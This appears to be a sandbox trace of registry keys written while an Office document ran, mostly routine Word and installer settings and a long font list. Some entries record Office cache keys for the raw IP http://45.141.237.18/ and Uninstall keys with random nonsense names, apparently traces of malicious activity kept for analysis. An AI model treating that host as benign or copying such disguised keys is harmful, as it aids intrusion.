HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache\http://45.141.237.18/
Expiration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\2B6C4
2B6C4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
8l;
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
9l;
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMaintenanceGuid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
TimeCacheMaintenanceStart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMigrationAttempted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Gratinr\Wr242\Boomerangernes\Hypercenosis
Spaits
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Imbibes\Marine\Cholinesterase\Unenviability
inestimable
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Workfare\Daunts\Erodible\Thurification
Geminates
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Halv\Gudsjammerlige
Afgrendes
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
l10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
030
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
050
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP5FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
TCWP6FilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\Recover
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\Recover
Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\Recover
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WrdPrfctDos
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WrdPrfctDos
Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WrdPrfctDos
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WordPerfect6x
Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WordPerfect6x
Path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\14.0\Word\Text Converters\Import\WordPerfect6x
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://45.141.237.18/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://45.141.237.18/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://45.141.237.18/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://45.141.237.18/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://45.141.237.18/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://45.141.237.18/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://45.141.237.18/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://45.141.237.18/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://45.141.237.18/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\6B4CE
6B4CE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
